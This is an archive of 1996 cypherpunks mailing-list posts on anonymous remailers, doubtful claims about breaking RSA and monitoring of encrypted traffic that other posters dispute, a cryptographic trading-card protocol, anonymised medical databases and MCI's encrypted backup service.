Message-ID: <Pine.3.89.9605291127.B10285-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 29 May 1996, E. ALLEN SMITH wrote:

> 	I am curious as to what systems these throw-away accounts are on; they
> would appear to be good output systems for ephemeral remailer endpoints.
> Admittedly, I suspect that this will take ecash remailers unless they're all
> through systems like aol.com that accept credit cards with inadequate
> verification (from what I know, check digit(s) only).

AOL's been mass-mailing intro packages (I just got one) with free time. I 
presume we will be seeing a rise in spam as more service providers try 
these marketing techniques.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 30 May 1996 09:23:55 +0800
To: cypherpunks@toad.com
Subject: Re: TIC_hip
Message-ID: <199605292004.NAA06310@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 PM 5/29/96 GMT, John Young wrote:
>   5-29-96. FiTi: 
> 
>   Chips Galore [Editorial]  
>   Texas Instruments' claim to have developed a technology 
>   capable of inscribing 125m transistors, or computing 
>   elements, on a thumbnail-sized slice of silicon is 
>   remarkable chiefly because the technique is commonplace. 

Having been following the progress of IC technology for over 20 years, I can 
recall when 1 million transistors/chip was the furthest-out prediction 
"they" were willing to make.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 30 May 1996 09:36:10 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605292009.NAA01448@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Remailers on the attack points (first in chain, last in chain) simply MUST
>>>be disposable as tissue.  They must be run as anonymously as possible,
....
>>	Why the first in chain? If the anti-traffic-analysis provisions are
>>working properly, it should be impossible to prove that a given first remailer
>>was the first remailer for any particular message. [....] entrapment 

>Likewise, I don't see why the first address in the chain is vulnerable, as 
>long as the message subsequently passes through at least one trustworthy 
>remailer, and probably  a temporary output address.  

There are two major problems, which have different impacts
- protecting the users from corrupt remailers, and
- protecting the remailers from spamming or entrapping users

To protect users from corrupt remailers, you not only have to pass through
at least one trustworthy remailer, you have to encrypt the message for
each remailer in the chain so that any corrupt remailers can't read it
at least until it's been through the trustworthy remailer.

Protecting remailers from users depends on the threat.  If the government
wanted to claim that all the remailers were part of a Conspiracy to
Distribute Laundered Narcoterrorist Tax Evasion Paraphrenalia, 
first-in-chain remailers become vulnerable,
since the Postal Inspectors can send entrapment material to them
and document where it comes out, though the path between first and egress
can't always be documented, depending on how the remailers handle mail.
On the other hand, if the Church of Spam tries to frame remailers
by posting their own Secret Documents, they can only target the
terminal remailers and as far back as they can subpoena,
because they'd otherwise have to admit that they posted it.

There's been some discussion of delivering outgoing mail by
sending it through systems that don't add Received: headers;
it may make sense for non-root-owned remailers to do this
using telnet to port 25 instead of their local sendmail,
to prevent local logging and prevent their sendmail from
adding its own information.  Some sendmails try to detect forgery,
but systems that aren't even configured to do Receive: probably don't.

 Bill
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Thu, 30 May 1996 07:06:50 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: [crypto] crypto-protocols for trading card games
Message-ID: <9605291713.AA28253@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 AM 5/29/96 -0400, you wrote:
>Design a set of crypto protocols to support the issuing, trading, and 
>playing of such card games in real time (100ms compute time per move)

        Well, not quite the same thing, but the cool stored-value cards in
Japan (for things like phones and the like) are very collectible. Everyone
wants a Armitage (anime) card!
_______________________
Regards,            If it weren't for the last minute, 
                    nothing would ever get done.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 30 May 1996 10:46:50 +0800
To: cypherpunks@toad.com
Subject: Where does your data want to go today?
Message-ID: <v03007004add260ff8274@[206.126.100.99]>
MIME-Version: 1.0
Content-Type: text/plain


>From <http://www.pcweek.com/news/0527/27stor.html>:

>Helping pave the way toward cost-effective disaster recovery
>systems, MCI Communications Corp. this week will join a growing
>number of providers offering file backup and storage over the
>Internet.
[snip]

>MCI and Connected house data on servers at two mirrored sites.
>Both companies are adding an extra dimension of security over the
>Internet by encrypting data.
>
>MCI's networkMCI Backup software, for Windows 95 or 3.x, will
>scan a file for viruses, encrypt it using an RSA Data Security Inc.
>public key and compress it before it is uploaded onto MCI's Internet
>backbone network to a secure storage facility, said MCI officials in
>Atlanta.
[snip]


Some comments (off the top of my head):

* What kind of encryption? [The article says RSA. ] How big is the key?
* Why encrypt before compression? If the encryption is any good, then the
encrypted data won't compress much at all. However, compression before
encryption has its own problems.
* Who does the key management (if any)?
* Does MCI store copies of the keys used?
* How does MCI authenticate users who request copies of files, and do they
then return them encrypted or as plaintext? If encrypted, how does the
recepient decryt the files? (He/she just had a disk crash, and this is
their backup medium, remember?)

I looked on MCI's web site <http://www.mci.com>, but couldn't find
anything. Besides, it's slower than sludge. [ 90 secs/page over my 128K
link. :-( ]

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We don't have to take it; never have, never will.
Gonna shake it, gonna break it; let's forget it: better still" --The Who,
"Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 May 1996 09:39:00 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: INteresting tidbit
In-Reply-To: <199605291501.LAA01290@jekyll.piermont.com>
Message-ID: <Pine.GUL.3.93.960529132910.25611G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 May 1996, Perry E. Metzger wrote:

> JOlson writes:
> > The following text is an e-mail I picked up from a firewall listserver.
> 
> I don't believe any of the story.

Oh, I believe he read the story on the firewalls list. I wouldn't go any
farther than that, though.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 May 1996 07:31:46 +0800
To: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Subject: Re: What is the strength of the MPJ/Diamond algorithm (Michael Paul Johnson 1989)
In-Reply-To: <01BB4D90.20F86640@JPKroepsli.S-IP.EUnet.fr>
Message-ID: <199605291743.NAA01615@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jean-Paul Kroepfli writes:
> I have seen the Diamond2 algorithm in the dlock2 package, with its
> predecessors MPJ, MPJ2.  This a thesis by Michael Paul Johnson for
> is Master of Science degree (1989), and a free softwar (date:
> 12/21/1995).  Schneier's Applied Cryptography doesn't say anything
> about MPJ or Diamond.  What is its strength?

Unknown. MPJ is a skilled amateur. However, none of his algorithms
have been rigorously analyzed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 May 1996 07:24:21 +0800
To: Clay.Olbon@dynetics.com (Clay Olbon II)
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <v01540b02add1fc6e4658@[193.239.225.200]>
Message-ID: <199605291844.NAA10130@homeport.org>
MIME-Version: 1.0
Content-Type: text



One solution to this is to have a database that 'generalizes' its
answers as it provides them.  For example, rather than returning 

Clay Olbon, 32, m, left handed, cholesterol 350, bp 200/160, 5'9", 175#, 
it would return:
fooblat martin,25-35, m, left handed, cholest. 3-400, 5.5-6ft, heavy.

researchers could then provide ranges to get answers.  Thus, if I'm
very concerned about the correlation between age and weight, I could
get that information very specifically and nothing else.

The generalization filter could be written to only allow N queries of
a given level of detail, so that the more detail you wanted in one
area, the more you give up in others.

There could be a review comittee (This is the way hospitals & medical
research works) to review requests for more specific data.

Doctors like having names, so you could genrate arbitrary names for
patients, or use a sylable genarator to come up with pronounceable
nonsense.


Adam

Clay Olbon II wrote:

| In medical research (this particular application - there are others I am
| sure) it is desirable to have a large database of individual medical
| histories available to search for correlations, risk factors, etc.  The
| problem, of course, is that many individuals want their medical histories
| kept private.  It is therefore necessary to maintain a database that is not
| traceable back to individuals.  An additional requirement is that people
| must be able to add additional information to their records as it becomes
| available.  The researcher who initially posed the question suggested
| adding random data to "encrypt anonymity".
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 30 May 1996 10:23:04 +0800
To: Remailer Operators <cypherpunks@toad.com>
Subject: Broken Nymserver
Message-ID: <Pine.NEB.3.93.960529140806.5605F-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	It turns out that the nym server at nymrod@nym.jpunix.com was
slightly broken. My tests indicate that it is fully functional now. I
apologize for the inconvenience.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMayhBlOTpEThrthvAQH3NwP/fF8SMTlV+LkaeyTz0YrWcY3wfeNaTkV/
u5JATy0yRgW/U/l6KsxI5mc2onVD5em2+srlvqb9JkLcQ8PTQWRSULwRpFO8rDvI
fEic0UBdObt8QpacbNUgWJeNfXzbgYfv6Po72fci3aWWBc6RLuLC/uAnYv4VaNej
IPyui2isWT0=
=PCKi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "[0m [5m    Toth"                         <1b2herma@nun.iut2-grenoble.fr>
Date: Thu, 30 May 1996 00:35:50 +0800
To: cypherpunks@toad.com
Subject: RSA breaking
Message-ID: <199605291221.OAA32353@nun.iut2-grenoble.fr>
MIME-Version: 1.0
Content-Type: text/plain


First i want to apologize: I'm french, my english is pretty good, but if there's some things you don't understand, don't hesitate to ask me further explanations.

  I'm studying computing. I've studied the RSA encription system, i know that PGP is based on RSA and o know that you give full confiance to PGP.
  As i and another student, have calculated, an RSA public key of a hundred numbers can't be broken with a software by the force method.(You all know that, sorry to say evidences :)  )
But, cause there is a but, it can be broken by an hardware system. Gimme the money, i'll break it, a simple algorithm can be "hardwarly programmed" and with very high-tech components, the speed it can have is enough to break an RSA key.
  It's for me an evidence that your government has already done it, and that your dreams of privacy are maybe a good joke for some bureaucratists of the pentagon.
  Of course it (would) take a little time, but as soon as they have your key, it's real time for them to decrypt.
  One constant thing in the RSA code is that it is always faster to find a key than to break it, that's why i suggest that you find a system of russian dolls encryption with PGP that would crypt a message a lot of times.
  For studying computing, i know that is time to decrypt a message with the key is so small, that even if i am wrong, it won't be a loss to use a multiple encryption.
  I hope i don't look like a rooky for you, this letter is humblously written.

     Greetings, salutations....

  No one is more vulnerable than the one who thinks he is, and who's wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 30 May 1996 03:03:08 +0800
To: cypherpunks@toad.com
Subject: Quantum Logic Gates
Message-ID: <199605291436.OAA25145@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   As complement to the ONE_two article on the NIST team's 
   latest work on quantum logic gates, we note that Malcolm 
   Browne also reported last August on parallel work at MIT. 
 
   We have put that article (keyed then as CAT_tal) at our 
   rickety Web site: 
 
      http://pwp/usa.pipeline.com/~jya/cattal.txt 
 
   Also, Signal magazine reported on this area of research in 
   its April 1996 issue at: 
 
      http://www.us.net/signal/CurrentIssue/April/ 
      Quantum-apr.html 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 30 May 1996 04:41:58 +0800
To: cypherpunks@toad.com
Subject: UNV_eil
Message-ID: <199605291544.PAA03412@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   21+C, Scanning the Future (UK), February, 1996: 
 
   "Dataveillance." 
 
   A global trend is emerging toward citizen surveillance. 
   While authorities speak of the need for data regulation and 
   people become digital shadows, watchdogs are doing some 
   monitoring of their won. With interviews of Phil Agre, 
   Roger Clarke and Simon Davies on invasive and privacy 
   technology. 
 
      These technologies face an uphill public relations 
      battle. Digital cash has already been widely accused of 
      providing money launderers, drug barons and other 
      criminals with the perfect means of continuing their 
      activities. It's the same argument that was used in the 
      Clipper Chip debate, in which the US government proposed 
      a central encryption software, and it will no doubt be 
      directed towards pseudonymous techniques as they emerge. 
 
      Simon Davies is familiar with this type of argument. He 
      says there has been a change of political winds in 
      recent years. Where once privacy was used to protect 
      individual freedoms it is now officially deemed by 
      governments and corporations to be an aid to criminals 
      and a barrier to administrative efficiency. "In a 
      generation, we now have privacy as almost like an 
      ancient forgotten wisdom," he says. Then he adds: "The 
      point that needs to be made very clear is that 
      technology has been misused. It always did have the 
      capacity, the capability to be a friend to people. 
      Instead, it has become a potential tool of enslavement. 
      And it has rendered society vulnerable on a scale that 
      has never been seen before. It is technologists and 
      politicians and financiers who have misused the 
      technology and should be brought to account for it." 
 
   UNV_eil 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 30 May 1996 05:03:04 +0800
To: cypherpunks@toad.com
Subject: TIC_hip
Message-ID: <199605291546.PAA03554@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-29-96. FiTi: 
 
   Chips Galore [Editorial] 
 
 
   Texas Instruments' claim to have developed a technology 
   capable of inscribing 125m transistors, or computing 
   elements, on a thumbnail-sized slice of silicon is 
   remarkable chiefly because the technique is commonplace. 
   ... 
 
   The consequences for society of this continued rise in 
   complexity are perhaps not fully grasped even in an age in 
   which computers are taken for granted. The latest 
   technology promises ubiquitous, tiny packages of electronic 
   intelligence. Today's model is the smart card and the tiny 
   videocamera. Tomorrow, tiny processors will be embedded in 
   jewellery, spectacles, buildings and furniture. ... 
 
   Widely distributed computer power will confer substantial 
   advantages on society; but it will create new ethical 
   problems for society, such as the individual's right to 
   privacy, which may be at least as difficult to master as 
   the technology. 
 
   ----- 
 
   FiTi reported yesterday and today on TI's new chip: 
 
   TIC_hip 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 May 1996 12:54:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: WSJ on "IRS-bashing"
In-Reply-To: <add1cc35180210049ac7@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960529153747.25611J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 May 1996, Timothy C. May wrote:

> If the CDA is upheld by the Supreme Court, which would surprise me, then
> "free speech" as we know it is gone completely.

I agree. I don't think it will surprise me, though, because it just ain't
gonna happen. :-)

> By the way, it's _already_ the case that "hurtful speech" can be prosecuted
> as a civil rights violation of a class of persons. If I refer to women as
> "bitches and hoes" ("hoe" = "whore," in certain American dialects) I am, as
> I understand things, technically in violation of various laws which outlaw
> the repression, subjugation, marginalization, and encheferation of women
> and other colored people.

Fascinating. Could you provide citations to these laws so that people in
this plane of reality might take a look at them? Over here, any such law
would be invalidated by R.A.V. v. St. Paul. The only exceptions are
restrictions on "fighting words" that meet the tests in Chaplinsky v. New
Hampshire and "hostile working environment" discrimination, which I assume
is what you're talking about, in some elliptical way.

-rich
 In February, John Howard opened a Ku Klux Klan museum and apparel store,
 called The Redneck Shop, in Laurens, S. Car.  Asked by a reporter what
 the reaction was by townspeople, Howard said, "The only people I've had a
 problem with, who took it as an insult and a racial situation, have been
 blacks.  I didn't know blacks here were so prejudiced."  [Louisville
 Courier-Journal-AP, 3-7-96]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 30 May 1996 09:17:18 +0800
To: Clay Olbon II <Clay.Olbon@dynetics.com>
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <v01540b02add1fc6e4658@[193.239.225.200]>
Message-ID: <Pine.SV4.3.91.960529160838.5354J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I would ask, is there any known medical gain that has resulted from 
such a data-base correllation.

I do not accept a researcher's own statements as to the utility of the work 
(S)he's done with someone's funding.  Seen too much of it at close 
quarters...   Nor do I accept reeports in the lay press - these are 
nothing more than re-gurgitated press releases from PR depts of institutions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 30 May 1996 09:15:50 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [crypto] crypto-protocols for trading card games
In-Reply-To: <Pine.3.89.9605291001.A10285-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SV4.3.91.960529161332.5354K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


What _did_   Solitaire do for Windows 3.1?   Distract the attention of 
the unwashed masses away from the actual merits of the beast?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "[0m [5m    Toth"                         <1b2herma@nun.iut2-grenoble.fr>
Date: Thu, 30 May 1996 02:46:28 +0800
To: cypherpunks@toad.com
Subject: Re: Re: RSA breaking
Message-ID: <199605291420.QAA20321@nun.iut2-grenoble.fr>
MIME-Version: 1.0
Content-Type: text/plain


>Yes, RSA can be "broken" if enough computer power is thrown at a small key,
> but what you wrote is not proof that PGP is "broken".
PGP is completely based on RSA, break RSA, it's breaking PGP at the same time.
>What size of key are you talking about?
I said a hundred numbers key, but it can be applied on more, course a thousand, even 200 or 300 seems quite impossible in matter of time.
>How much hardware?
Difficult to evaluate, as long as it is not really my way(it's programming), but it's kite simple to make hardware from algorithms, just with an optimized eratosten crible(it's the name in french, i don't know the translation, but you'll certainly understand).
>How much cost?
Hard to evaluate, an infinite amount of money(i mean in matter of research) would be enough, sure that only a big lab, or a government can support this, but as soon as built, the breaking box is of no price.
>Please back it up with some numbers.
For the cost, i can't evaluate, for the time, i'll calculate tonight, and will send results tomorrow.
  Sincerely yours, 
     Eric
 PS: Hope not everyone will take my mail as bad as you think to take it, a thousands pardon if i misunderstood(or you), but it's quite hard for me to follow in English, and to explain with full subtility.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 30 May 1996 11:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: Internet traffic is monitored.
In-Reply-To: <199605290937.LAA16955@basement.replay.com>
Message-ID: <Pine.LNX.3.93.960529161530.222A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 29 May 1996, Anonymous wrote:

> # begin story
> 
> A person working on the MBONE project did an unannounced experiment
> across the internet using Triple-DES for MBONE, and the very next day, 
> 'ATF' agents knocked on his door and warned him against exporting 
> munitions.  The experimentor was shaken by the fact that agents 
> approached him so quickly after the experiment.
> 
> # end story

Do you have any information to back this up?  It sounds like an urban myth.
Also, AFAIK the ATF isn't the agency that controls arms exports.

> 
> Extrapolations of fact:
>    1.   Internet traffic is monitored.

Maybe.  But I doubt that the above story is true.

>    2.   The ability to snoop for encrypted traffic is present

And how exactly is this done?  Unless data is tagged with a header, encrypted
traffic is indistinguishable from random data.

>    3.   The ability to identify encryption levels is present
>         (How else can they differentiate DES-1 from DES-3?)

Same as above.

>    4.   The ability to crack DES-1 in near real-time mode is present.
>         (See above).

Several years ago, the cost of building a DES cracking machine was $100 million
dollars.  this value is now much smaller.

>    5.   If above=true, then Feds dropping the Zimmerman PGP case probably
>         also points to it also being crackable in a similar manner.

The Feds dropped the Zimmerman case because there wasn't any evidence to
support the accusation that PRZ had exported PGP or broken any laws.  Also,
if someone was ever tried for ITAR violations, it would most likely be found
unconstitutional.

>    6.   Using encryption only flags traffic for capture and decryption, 
>         using strong encryption makes you all that more interesting.

This is why there is steganography.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMayySbZc+sv5siulAQHw5QP7B6FhdMxpQQ/neNJcQnNG0hwu0bsDmmes
Is6wC14qkIaKUSF2yak4cQDqwOMBj9O/0l357YDHFSXTsZm9Bq3pBYCDg8Ws55/0
1BUz6WEi+Clf2WQz4i9FVhYESPQ3zIIYTJMjn9H0v3KQqojQTP9Z4zhgFeRjHfjn
rBfdvRDwCPw=
=Zye2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Thu, 30 May 1996 09:47:20 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
Message-ID: <199605292058.QAA24885@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> On Wed, 29 May 1996, Simon Spero wrote:
> 
> > Design a set of crypto protocols to support the issuing, trading,
> > and playing of such card games in real time (100ms compute time
> > per move)
> 
> I'd been thinking about it from the opposite point of view: make up
> a card game (possibly electronic, like what you're proposing) that
> acts as intro to crypto for the untamed hordes of game players. 
> 
I've had similar ideas, but there are snags.  Card playing via 
encryption techniques is a great idea in theory, but in reality the
technical requirements often prevent implementation.

Think of the requirements of this system:

1. Cards must be transferrable.
2. Cards must not be duplicated by anyone other than the game 
company.
3. Cards must be able to be randomly shuffled.  (Since most trading
card games are two-player games our task is simplified greatly.)

Here is one possible algorithm, and some of its weaknesses.

The game company generates a master public key pair with which it will
sign all game cards.  Each player generates a public key pair to
verify his identity.

Each card is composed of the following fields:
A serial number, so that each card is unique.
A public key generated by that the owner as a proof of indentity.  
  (Each card owned by a player will have the same public key.)
The name of the card and (optionally) a desception of its effects.

Each card is then signed using the game company's secret key.

For each game both partners generate a public key pair.  Alice then
signs each card in her deck with the public key she generated for this
game and then transmits the cards (in a random order) to Bob. Bob does
the same thing for his deck. Each time Alice needs a card, Bob selects
one of Alice's encrypted cards and Alice decrypts it. 

As an additional measure to determine that Bob's cards are genuine,
Alice sends Bob a random string and asks that he sign it with the
secret key that matches the indentity-verifying public key on his
cards.  If Bob can return a signed version of that string, the
ownership of his cards is verified.  This indentity verifying routine
can be conducted as soon as Bob's first card is revealed. Bob of
course, conducts the same procedure for Alice after she plays her
first card.

After the game is over (or Alice's deck needs to be reshuffled), she
reveals her secret key and Bob verifies that her cards are genuine and
that she played fairly.

Advantages:

This system prevents anyone other than the game company from
duplicating cards (each card has a unique serial number), and from
copying other people's cards (each card has an indentifying public
key).

Any cheating can be discovered at the end of the game.  Bob knows the
order in which he selected Alice's encrypted cards.  After the game,
when Alice hands over her game-session secret key, he can check to
make sure that Alice revealed her cards in the order he selected them.

Only a reasonably amount of encryption/decryption is required.  Most
importantly only one key per player needs to be generated for each
shuffle.  During play only decryption is required.  In other words, a
modicum of set up is required, but once play begins the decryption
shouldn't slow the program down appreciably.

Disadvantages:

The entire integrity of the system relies on the security of the
game company's key pair.  If the secret key is comprimised, either by
a disloyal employee or by crytographic techniques, all cards in
existence must be recreated.

Cards are not transferrable.  In order to make cards transferrable the
game company must be able to invalidate cards which have been traded
to others.  In other words if Alice wants to give a cards to Bob she
must:

1. Contact the game company and tell them she wants to give the card
to Bob. 2. The game company must issue a new card to Bob with a new
serial number and with Bob's public key rather than Alice's. 3. The
game company must invalidate Alice's old card.  Since there is no way
that the game company can make sure all copies of the card have been
destroyed it must create a "invalid serial number list" and have the
players dial into that list everytime the game is played.

Since step 3 is so costly to implement, I think it is unlikely that a
cryptography-based trading card game will have tradable cards.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMay5ZvBB6nnGJuMRAQHYFAQAl/PwCB0U/rQfjNgdoeLNpo9TyPAdebhT
FWjE44zjTmr6Cbl6S5D9QsqLub6eDI5DsXhD+w4Tipjn9/GZwQtFpEORx9MeAUWh
9TCtcDY4Tn5d8aNwtVikHt971uW6ROU7qWikIDipxotWtTscl8NESZbgmZqGOBWW
4VzGRMuIr1E=
=bXqs
-----END PGP SIGNATURE-----
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "[0m [5m    Toth"                         <1b2herma@nun.iut2-grenoble.fr>
Date: Thu, 30 May 1996 04:03:30 +0800
To: cypherpunks@toad.com
Subject: Re: Re: RSA breaking
Message-ID: <199605291505.RAA102870@nun.iut2-grenoble.fr>
MIME-Version: 1.0
Content-Type: text/plain


>        System of Russian dolls? What would you suggest?
  My idea(it is not me that found that) is that tou could have many public keys, when someone want to send you something, he just mail you his(or her) keys, and then you encrypt with the first key, then with the second, etc...
  This system is used by some anonymous remailers:
Each one has a key, you encript your text with the key of the last remailer, then you put your text, the adress of the people tou want the letter to be sent, then encrypt it with the key of the before the last remailer, and put the adress to be sent of the last remailer, etc
So your letter is decripted by the first remailer, then sent to the adress found, then the second remailer decrypts it, etc, like an onion.
  The fact is that you can obtain a very good privacy if you have some keymaker programm. Let suppose you want to send me a crypted text(don't, it's forbidden to crypt in france), you mail to my remailer, that choose 1000(arbitrary number) keys, that send it to you, crypted with your key, you crypt your text the necessary number of times.
  This way, the message will be maybe uncrypted by someone, but if the key change for each message, someone can't find your key, i insist on this danger, having one key is useless as soon as someone found it.

>What kind of system do you think would be needed to crack RSA coded messages?
  As i said, it is impossible to break an RSA code with softwares, the best attempt was 25 days with ten Crays linked for a key of only 50 numbers.
  But this can be done as i said before with a simple eratosten crible "translated" into hardware. Sorry electronic is not my way, but for the exemples i saw in class, it is really to the ability of a basic electronician, and they were more complicated than what i am talking about.
  The best components you have, the faster you'll go, so a governement or a bog private lab can afford this kind of prices.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 30 May 1996 12:29:24 +0800
To: mclow@owl.csusm.edu
Subject: Re: Where does your data want to go today?
Message-ID: <9605292205.AA02198@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >From <http://www.pcweek.com/news/0527/27stor.html>:
> 
> >Helping pave the way toward cost-effective disaster recovery
> >systems, MCI Communications Corp. this week will join a growing
> >number of providers offering file backup and storage over the
> >Internet.
> [snip]
> 
> >MCI and Connected house data on servers at two mirrored sites.
> >Both companies are adding an extra dimension of security over the
> >Internet by encrypting data.
> >
> >MCI's networkMCI Backup software, for Windows 95 or 3.x, will
> >scan a file for viruses, encrypt it using an RSA Data Security Inc.
> >public key and compress it before it is uploaded onto MCI's Internet
> >backbone network to a secure storage facility, said MCI officials in
> >Atlanta.
> [snip]
> 
> 
> Some comments (off the top of my head):
> 
> * What kind of encryption? [The article says RSA. ] How big is the key?

Web page, and sign-up email doesn't say...

> * Why encrypt before compression? If the encryption is any good, then the
> encrypted data won't compress much at all. However, compression before
> encryption has its own problems.

This is just confusing wording I am sure - marketing/press-release
people rarely get the details right.
I would guess, that in order it is scanned, compressed, and then encrypted.
Nothing else makes sense.

> * Who does the key management (if any)?
> * Does MCI store copies of the keys used?
> * How does MCI authenticate users who request copies of files, and do they
> then return them encrypted or as plaintext? If encrypted, how does the
> recepient decryt the files? (He/she just had a disk crash, and this is
> their backup medium, remember?)

These are all good questions....

> I looked on MCI's web site <http://www.mci.com>, but couldn't find
> anything. Besides, it's slower than sludge. [ 90 secs/page over my 128K
> link. :-( ]

http://www.mci.com/productview/framelements/backupindex.shtml
(probably need netscape2 for this.)

I requested to be a beta-test member and got confirmation email.
I guess I'll wait until they contact me "early this summer" and
see what their software does....

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 May 1996 10:07:40 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Internet traffic is monitored.
In-Reply-To: <Pine.LNX.3.93.960529161530.222A-100000@gak>
Message-ID: <199605292113.RAA02043@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Mark M." writes:
> > Extrapolations of fact:
> >    1.   Internet traffic is monitored.
> 
> Maybe.  But I doubt that the above story is true.

>From what I can tell, the story is pure excrement.

Just to give everyone a reality check here, I routinely use encrypted
links across the net, often internationally. A houseguest of mine used
3DES from my apartment to his office in Finland for days. No one has
as much as sneezed at any of this. None of it is the least bit unusual
or illegal to begin with.

Perry




